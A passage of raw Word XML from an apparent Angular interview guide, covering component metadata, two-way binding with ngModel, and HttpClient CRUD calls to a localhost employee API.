          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0245AA26"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selector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="459D1C91"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he custom HTML tag used to render the component.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="08080726" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="219B7D0C"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emplateUrl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6518EB4E"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Path to the HTML file (view) associated with the component.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="1FD44297" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3707014A"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styleUrls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22C94E79"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Path(s) to the CSS file(s) for styling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="32DA9B6D" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D0B4B09"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lass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="254A6A3E"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tains the component's business logic, variables, and methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="3F8C65D0" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07896258"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structor()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C8E70DB"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For dependency injection (services, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="22D440C7" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="082AB7C1"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lastRenderedPageBreak/>
              <w:t>ngOnInit()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69D81CC2" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000"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Lifecycle hook that runs when the component is initialized.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49DC2216" w14:textId="55D507F6" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="54798AF7">
          <v:rect id="_x0000_i3495" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D172AD" w14:textId="182886C8" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="000B552F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="861" w:name="_Toc196308341"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidR="00C25623" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>two-way</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> data binding in angular</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="861"/>
    </w:p>
    <w:p w14:paraId="65D90279" w14:textId="5A4A2677" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373A" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Two-Way Data Binding in Angular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5140D2DE" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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Two-way data binding</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows synchronization of data between the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>component class</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>template (view)</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If data in the component changes, the view updates automatically, and vice versa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6729A" w14:textId="77777777" w:rsidR="00A6373A"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83C4544">
          <v:rect id="_x0000_i3496" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C763A0" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373A"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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6145B742" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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Angular provides two-way data binding using the special syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A94396A" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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ngModel)] = "property"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336B7A90" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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This is called the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>banana in a box</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> syntax – combining:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D49C519" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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for property binding (component → view)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B214E" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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for event binding (view → component)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D98347" w14:textId="77777777" w:rsidR="00A6373A"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B39F9FA">
          <v:rect id="_x0000_i3497" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E21BF" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373A"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB1660A" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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app.component.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA47CAD" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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AppComponent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144FDA08" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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name: string = 'Siddhant';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C2F02" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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0F545238" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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app.component.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E2F6CD" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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lt;input [(ngModel)]="name" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E22E2C1" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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lt;p&gt;Hello, {{ name }}!&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B61B624" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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hen you type in the input box, name in the component gets updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E956D7B" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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hen name is updated in the component, it reflects in the input and &lt;p&gt; tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595B876" w14:textId="77777777" w:rsidR="00A6373A"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A37AF1B">
          <v:rect id="_x0000_i3498" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD26A39" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373A"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Prerequisite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1241E101" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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o use [(ngModel)], you must import FormsModule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461A41B" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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app.module.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E150E3" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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 FormsModule } from '@angular/forms';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE8ED54" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E599B0" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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NgModule({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B45DD89" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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imports: [BrowserModule, FormsModule],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250C07D" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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2EF54EA8" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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13D7554E" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373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AppModule {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1FF25A" w14:textId="13DE7CBA" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="5FA68F90">
          <v:rect id="_x0000_i3499" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AADCB3" w14:textId="6575BDC9" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00A976FD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="862" w:name="_Toc196308342"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to make backend calls in angular</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="862"/>
    </w:p>
    <w:p w14:paraId="50EE6F28" w14:textId="2D5459BC" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Making Backend Calls in Angular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662B2440"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o make HTTP calls from an Angular frontend to a backend API (e.g., Spring Boot), Angular provides the HttpClient service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201A9979" w14:textId="77777777" w:rsidR="00E72E77"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F8E40E">
          <v:rect id="_x0000_i3500" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="377E71DA" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77"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Steps to Make Backend Calls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E28932" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77"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 Import HttpClientModule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B60433"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Add this in your app.module.ts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CC0BD7"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 HttpClientModule } from '@angular/common/http';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF25ED" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198EC161"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NgModule({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149D5645"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imports: [HttpClientModule]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73035919"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627E1196"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AppModule {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19758AED" w14:textId="77777777" w:rsidR="00E72E77"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51D0AB">
          <v:rect id="_x0000_i3501" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5F5AFF" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77"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2. Inject HttpClient in a Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E32CB9E"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lastRenderedPageBreak/>
        <w:t>Create a service (recommended) to handle API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBA4437"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ng generate service employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD7C753" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77"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employee.service.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0690B8"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 HttpClient } from '@angular/common/http';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EACD52"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 Injectable } from '@angular/core';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D37A8A"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 Observable } from 'rxjs';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0610B902" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A963009"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njectable({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBD9D7A"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providedIn: 'root'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F4888"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3B9E62F2"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EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4646BA13" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225D54C7"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private apiUrl = 'http://localhost:8080/api/employees';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718A2304" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B6E50A7"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constructor(private http: HttpClient) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32190EC7" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0658C8A8"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getEmployees(): Observable&lt;any&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171678C6"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return this.http.get(this.apiUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5424100E"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0688D7E9" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACFAB8F"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addEmployee(employee: any): Observable&lt;any&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF56358"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return this.http.post(this.apiUrl, employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF0EB01"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48745C81" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330DA438"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updateEmployee(id: number, employee: any): Observable&lt;any&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D61CCA4"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return this.http.put(`${this.apiUrl}/${id}`, employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF47052"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0B85AADF" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F8DF84"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deleteEmployee(id: number): Observable&lt;any&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A38EC3"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return this.http.delete(`${this.apiUrl}/${id}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A8B771"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27923368"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2ECAEFF4" w14:textId="77777777" w:rsidR="00E72E77"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6BEF2F6">
          <v:rect id="_x0000_i3502" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A642EF2" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77"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3. Use Service in a Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3069C272" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77"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employee.component.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645562A8"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 Component, OnInit } from '@angular/core';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB6BFAB"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 EmployeeService } from './employee.service';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE3C789" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="306A8007"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mponent({</w:t>
      </w:r>
    </w:p>
